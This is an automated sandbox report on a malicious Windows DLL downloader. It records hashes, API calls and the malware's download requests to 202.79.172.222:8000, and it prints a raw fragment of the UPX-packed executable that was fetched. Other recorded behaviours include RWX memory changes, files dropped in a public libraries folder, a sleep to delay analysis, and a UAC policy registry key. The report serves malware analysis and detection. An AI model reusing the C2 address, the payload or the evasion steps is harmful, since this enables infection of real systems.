Summary | ZeroBOX

j-10

Malicious Library Downloader UPX PE File DLL PE32 ZIP Format JPEG Format
Category Machine Started Completed
FILE s1_win7_x6401 Nov. 11, 2023, 4:18 p.m. Nov. 11, 2023, 4:20 p.m.
Size 73.5KB
Type PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
MD5 cbb30cf779a03c4a42012fe3991a3ab3
SHA256 b41da50ebdce879341e77c809e5c458721326c5d7d6f53feb76b220f0b1e718b
CRC32 E08CEDBC
ssdeep 1536:awsdCFnE4Nz1/SXPtpoprAeDYxUfGJhK5O:awsAik1a4pGJhK5O
Yara
  • Malicious_Library_Zero - Malicious_Library
  • IsPE32 - (no description)
  • PE_Header_Zero - PE File Signature
  • IsDLL - (no description)

Name Response Post-Analysis Lookup
No hosts contacted.
IP Address Status Action
202.79.172.222 Active Moloch

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://202.79.172.222:8000/1
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://202.79.172.222:8000/2
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://202.79.172.222:8000/3
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://202.79.172.222:8000/4
request GET http://202.79.172.222:8000/1
request GET http://202.79.172.222:8000/2
request GET http://202.79.172.222:8000/3
request GET http://202.79.172.222:8000/4
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 2560
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73bfe000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2560
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x75d41000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2560
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x75e61000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2560
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x76161000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2560
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x764b1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2560
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73660000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2560
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73571000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2560
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x734e1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2560
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x734a4000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2560
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73572000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2560
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73c11000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2560
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x76281000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2560
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x75bc1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2560
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x75d21000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2772
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73572000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2772
region_size: 94208
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02d30000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
description xBkkGuaG.exe tried to sleep 439 seconds, actually delayed analysis time by 439 seconds
file C:\Users\Public\Libraries\GMjHlXXkw\9Z8y.exe
file C:\Users\Public\Libraries\GMjHlXXkw\xBkkGuaG.exe
file C:\Users\Public\Libraries\GMjHlXXkw\xBkkGuaG.exe
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 2772
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 155648
protection: 32 (PAGE_EXECUTE_READ)
base_address: 0x10001000
process_handle: 0xffffffff
1 0 0
Time & API Arguments Status Return Repeated

InternetReadFile

buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $aõ%s¦%s¦%s¦s`¦s¦¦}¦s¦q=C¦?s¦Ú>y¦(s¦%r¦xs¦G`¦<s¦8y¦÷s¦8x¦s¦%s¦¤s¦âu¦$s¦Rich%s¦PEL¸õTà à@P 0>` @@€Ào$uÄ@$5pUPX0P €àUPX1à` à@à.rsrc@@:ä@À3.91UPX!  QµÙŽä½ª‘&ÞÀ&/ÿÿÿÿ‹Á‹L$ƒHÿ‰HÇ4hNÂV‹ñè/.öD﾿ý$tV ASY‹Æ^6ÇIÃÿqûÿý‹ÿt$ P ¸lMT ß@ƒìƒmÿ·ÿMèÿSVW‹}–9} ‰eð‰uìs Wûÿîߛ*Y‰EMÜۋMƒeüWÆEü¨ooíuž4~üÿ‹Ø<BÿvÔ‹ÎSoßm1 )]˜F¤™…ü;ßtý­=¸µ6I‹4Yœô_^d‰ Z»öÿ÷Ð[É ‹Eä*èHêàìƒw Ö¥¿7jjmƒSð_¸Ô4yùlí{Á3ÛLԉ]üTEñÀIáíwy^¡<ðQžÐRÌÿ¾T§<í&S:ÐÐÀ^È¿»öûP/EÀzPj ô4ëG…ÀuiؙvÌMCäxÿhŽdjÿQ‹Ïbîap/â‹øÇt˜8|³ûIÊßN¦Hˆ™9¼FFu-‹Áó0†Çì£mù‡·Eè3ÛSSßýçé¹ :R‹h/@+{ÿþàYÃö,u€ KFÃ>r¥û U_¹(Lhord@(ù±èr†³ƒ`Äl<€œH FU‹ìw<üTF h1¢‹ðYÞAхöf¾š¦*ƒ{Ř ¶Vf‰†íí†ÿ\ƒÄ ë3özô3Àü¿€0‹ýÿφÈÀøÁá3ҋò‹Ù#÷#ß3óðãß¾æÒ3U^ÑâÑáÿMøuˆüƒa7Üâ@=tZ¬|ÄÚC`ñáدé;xÈ%†u—çÿ \$‹ð…öYt!ÀFp/‰žstàÛÿàvÀDøj‹Ê^öÁªÑé3ËØàoúBéNuÂBƒÇú9|ÝÁ U6,Î(èQOÍñÑj8ðè>uçÎ Ӄf8 d„Ž3;fÖÂÖkÈãÉ#@éÍ^U L¬‰pü¿ÙA|ÐH…Òt,‹Q @SWØý»à&\*¶pçÿ¤3ûFÁ诣3¼&<º3Ç®cuö[D^¦Óu«]XȤPvx-Út¢°—PáBäFrÉ÷uí^ÃE°ï× b´W"3ÿLʁÃ9ˆ•Ƌ€šš V dÌÎÄðÚ¼Œ ‡+ëº@¦Àtå7XÉ)ä³kœ‚©ü‰Mð„T‡!T_ Á]éøÀ‚Ž¸‡ kÓÁ½ãkú>+u,ÇF,äb|·¦iZ8<40@*D 4MӞHLPTX(íTÚԋ,¡Üâîò;÷8tžzàÚµ[¾€ † Œ†®Ð3*|Lδ¦óàO`Hjë.-¶€9F(^À²ü@mæ2ÃÁî¼89_ü ì^8tòZ‹x;û„mÜ9_,o®´Û|.Hu0Lu4Œ‹÷¿ÖF´TJ‚‹G4;Ã|e+àÛt`Xt[P¶@Ïðnhí9W8(&Pp‰þuÿ?{»ÂT²ÿO4$(} ƒè(|ƒƒŽÅjú Wwöaðsì1s{ÚÅ3Ö,MÌHtH @äÈð:˜@ÝOåvÕ,,ø*œ|Ê·Ü,ÿë§ð0^"¸ŒLäu¦\.•I00Ô00'‡ŒÇä4;ÿ.oN³þÿÿªX…¡ÈŠáÉèGeép SEèÑèÔñ‡Bh—VWÝ·M+38N, *9€FðhÂÁÿ9Xøu hÈóPç"Woø5ûSÖ¦ð-“#ëqA£æa5EàPÒª}÷ð„¢QãÕÿ5Èl½òNr–&ìQ;ÿ0À-~œ^"ái`;–çæîG¬}à›aëÍN(F«¥'¶pF52À.†t% ‹ÙÒs0Ìüðõ¸XƋ6Pr Ê>|›:uã_K¡~SÕÉ´ƒ ¶¦\• Qš®Ã×v&ìäÀà¾pÉ~Si¡Àù';÷#’Ä‚' 0j8Ý_Ñ~¯‹ÈŠè;ω}üt ‰â-0‹ðäâ›8E»RÙ +OIÅ_´T…9xøtb蹐Ê3ð Näë»<7å èWWSüh?é.i))ÁApmj #êºýø  óªìë>9}Vþ_özÂuÓ x N9{Pu ‰~,ƒ¿"Ó0’o8÷Hàè€ÝF,—H%4? GðŒÌÅ?q†× *ìƒ$ÀÂtZÿ0|à öì8œpê҉Q¹þhƒbëƒaY ßGá'Æz` w"üÍ°‹N…ÉtÎvpà¼ÂñÎVŒð3±S‰[ÅíVQW¢;Ç4šVÐZ‹âøJÄ ¶md×+Ý_úþªv†jèŽñ¾÷Шt!oÔ A µÙ‹.t<¢­ `ªðP£½ã†Å¿Žßëì;¶pHôSX® ±Cl“ÎK ‡íuç[Ä]Å NQd@¤m䝂+¿«ƒ„ö(Xôu/jFL—+½üü ¸ƒÀIIDô|A‹VÐþÒöƒè Iuò‹hjßÁûÀ‹"‹G ‰ãFíÿFG#[|íð,6>Q€ÿIˆ6dAη$ù4ÃmÎ6Qk0ÕD6ó$iëT lz\ô¯F4 X8šÿE c]` )ãÕÎrÛoÓ¬áL,&€ãÆÈ£åDœå'Ãg -8L€+îÍIËY„ºBhø3Û .ÀïPüPSV5D`T+ñ_ȉ]øÜ5`ÌÿÖ¯À…¸XBƒÿh]ÛäaD=êzus9]^nPüÝ¡B?Lá;Ã@ôW Ñíڍݲ†µFô°«à]`«IrÔ;ótõ¿Á]¸ÏFO8‰_8ÿwO ðCÅëÓß+>´0ë S±8ãSà3À„Tþ7,f´ƒøþt);Ft$ |ԝ¹Þ"(h`0P–Œ[>=™âxçþŠ‡vÊ OƒøÿN‡“£Îmjÿj-®e6†$¤í`-ž×ñ2M(Vï.H$>ô7® v,êÿ7‹ÃÁà3íÖÐ (*#ƒÇ$C;VrÆñ¤‡Ô]œùg+8 ˜@·ðX; \ œ»Ïß۟cø‹Á€`zÇ@ (ǃ۷Ý<j'Ilƒù| èçöÍc%tatO~f<~;[nwéu\Š$€ù X€ù~ûì—J€ÿ¾É¶|3ÓɾOÿ+*ë&.Ðùú§½ãíëfë â×Y®ù¿wòŠ:ƒétIuÀ7ÁÝ0ÇäïtM¸irE¯Ãð¸n SUe‰¤p³jÓU~ k~<ŸïØÄj ܉\$ ..Ç‹=öéè²0n]‰ˆ^h|‹Ñî »©Sˆú,zÆFm¶mÕ\ ¶.^,_:`/~š ­,l®LdP×PU±MÑì\†^øS+Ë$•Ë_¹$•`(@‘_©FÒÆ@ j[¿¥¸^0ªÏ¸7nƒwäãJM‰ò<è]p ßo ×e(ˆVý婄ƒHæ$…RtÕ ë‹G¬ g¡3ŸîÕh0¦+„r_w@¢láH<µA†¦À°jëèœîNªÝ5û^Mˆ°{pÝBü¾U‚->–ý)@îDïSŠ]—Ä‘èlt ž‡Wuœ=?V™6] ÃR:[;¾ýÿtMƒè#t?jY+Át/tHHdHuðãg‰N‚G`„Jƒf@û¾4]ÇF^ëuË«¼Ï ëi`:ÛkÏí_ëW˜<tH;/ "u åý‚8E„Ût b WyÿÉ&‡ˆ^ë((ÿy•L±\ˆF èÀíE€}…<[¦_ ÿÂ’A;þ]ÑVVC§uÝh¹r&á©£
request_handle: 0x00cc000c
1 1 0
Time & API Arguments Status Return Repeated

Process32NextW

snapshot_handle: 0x00000280
process_name: xBkkGuaG.exe
process_identifier: 2772
0 0

Process32NextW

snapshot_handle: 0x00000280
process_name: xBkkGuaG.exe
process_identifier: 2772
0 0

Process32NextW

snapshot_handle: 0x000002a8
process_name: xBkkGuaG.exe
process_identifier: 2772
0 0

Process32NextW

snapshot_handle: 0x000002a8
process_name: xBkkGuaG.exe
process_identifier: 2772
0 0

Process32NextW

snapshot_handle: 0x00000354
process_name: xBkkGuaG.exe
process_identifier: 2772
0 0

Process32NextW

snapshot_handle: 0x00000354
process_name: xBkkGuaG.exe
process_identifier: 2772
0 0

Process32NextW

snapshot_handle: 0x000001f8
process_name: xBkkGuaG.exe
process_identifier: 6619244
0 0

Process32NextW

snapshot_handle: 0x00000360
process_name: xBkkGuaG.exe
process_identifier: 6815811
0 0

Process32NextW

snapshot_handle: 0x00000368
process_name: xBkkGuaG.exe
process_identifier: 7340153
0 0

Process32NextW

snapshot_handle: 0x0000036c
process_name: xBkkGuaG.exe
process_identifier: 7274610
0 0

Process32NextW

snapshot_handle: 0x00000370
process_name: xBkkGuaG.exe
process_identifier: 7602224
0 0

Process32NextW

snapshot_handle: 0x00000374
process_name: xBkkGuaG.exe
process_identifier: 7536688
0 0

Process32NextW

snapshot_handle: 0x00000378
process_name: xBkkGuaG.exe
process_identifier: 3014768
0 0

Process32NextW

snapshot_handle: 0x0000037c
process_name: xBkkGuaG.exe
process_identifier: 7274573
0 0

Process32NextW

snapshot_handle: 0x00000380
process_name: xBkkGuaG.exe
process_identifier: 5046390
0 0

Process32NextW

snapshot_handle: 0x00000384
process_name: xBkkGuaG.exe
process_identifier: 6815859
0 0

Process32NextW

snapshot_handle: 0x00000388
process_name: xBkkGuaG.exe
process_identifier: 6881397
0 0

Process32NextW

snapshot_handle: 0x0000038c
process_name: xBkkGuaG.exe
process_identifier: 7602277
0 0

Process32NextW

snapshot_handle: 0x00000390
process_name: xBkkGuaG.exe
process_identifier: 6619235
0 0

Process32NextW

snapshot_handle: 0x00000394
process_name: xBkkGuaG.exe
process_identifier: 4456552
0 0

Process32NextW

snapshot_handle: 0x00000398
process_name: xBkkGuaG.exe
process_identifier: 7536758
0 0

Process32NextW

snapshot_handle: 0x0000039c
process_name: xBkkGuaG.exe
process_identifier: 7602277
0 0

Process32NextW

snapshot_handle: 0x000003a0
process_name: xBkkGuaG.exe
process_identifier: 6684769
0 0

Process32NextW

snapshot_handle: 0x000003a4
process_name: xBkkGuaG.exe
process_identifier: 7536752
0 0

Process32NextW

snapshot_handle: 0x000003a8
process_name: xBkkGuaG.exe
process_identifier: 7602275
0 0

Process32NextW

snapshot_handle: 0x000003ac
process_name: xBkkGuaG.exe
process_identifier: 7536761
0 0

Process32NextW

snapshot_handle: 0x000003b0
process_name: xBkkGuaG.exe
process_identifier: 4390992
0 0

Process32NextW

snapshot_handle: 0x000003b4
process_name:
process_identifier: 5439572
0 0

Process32NextW

snapshot_handle: 0x000003b8
process_name: xBkkGuaG.exe
process_identifier: 6553715
0 0

Process32NextW

snapshot_handle: 0x000003bc
process_name: xBkkGuaG.exe
process_identifier: 5046338
0 0

Process32NextW

snapshot_handle: 0x000003c0
process_name: xBkkGuaG.exe
process_identifier: 6619246
0 0

Process32NextW

snapshot_handle: 0x000003c4
process_name: xBkkGuaG.exe
process_identifier: 6750273
0 0

Process32NextW

snapshot_handle: 0x000003c8
process_name: xBkkGuaG.exe
process_identifier: 7471220
0 0

Process32NextW

snapshot_handle: 0x000003cc
process_name: xBkkGuaG.exe
process_identifier: 7733331
0 0

Process32NextW

snapshot_handle: 0x000003d0
process_name: xBkkGuaG.exe
process_identifier: 4980808
0 0

Process32NextW

snapshot_handle: 0x000003d4
process_name: xBkkGuaG.exe
process_identifier: 6619251
0 0

Process32NextW

snapshot_handle: 0x000003d8
process_name: xBkkGuaG.exe
process_identifier: 7340109
0 0

Process32NextW

snapshot_handle: 0x000003dc
process_name: xBkkGuaG.exe
process_identifier: 7864421
0 0

Process32NextW

snapshot_handle: 0x000003e0
process_name: xBkkGuaG.exe
process_identifier: 3342387
0 0

Process32NextW

snapshot_handle: 0x000003e4
process_name: xBkkGuaG.exe
process_identifier: 3014722
0 0

Process32NextW

snapshot_handle: 0x000003e8
process_name:
process_identifier: 7733362
0 0

Process32NextW

snapshot_handle: 0x000003ec
process_name: xBkkGuaG.exe
process_identifier: 6553705
0 0

Process32NextW

snapshot_handle: 0x000003f8
process_name: xBkkGuaG.exe
process_identifier: 2772
0 0

Process32NextW

snapshot_handle: 0x000003f8
process_name: xBkkGuaG.exe
process_identifier: 2772
0 0

Process32NextW

snapshot_handle: 0x000003f4
process_name: xBkkGuaG.exe
process_identifier: 2772
0 0

Process32NextW

snapshot_handle: 0x000003f4
process_name: xBkkGuaG.exe
process_identifier: 2772
0 0

Process32NextW

snapshot_handle: 0x000003f4
process_name: xBkkGuaG.exe
process_identifier: 2772
0 0

Process32NextW

snapshot_handle: 0x000003f4
process_name: xBkkGuaG.exe
process_identifier: 2772
0 0

Process32NextW

snapshot_handle: 0x000003f4
process_name: xBkkGuaG.exe
process_identifier: 2772
0 0

Process32NextW

snapshot_handle: 0x000003f4
process_name: xBkkGuaG.exe
process_identifier: 2772
0 0
host 202.79.172.222
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin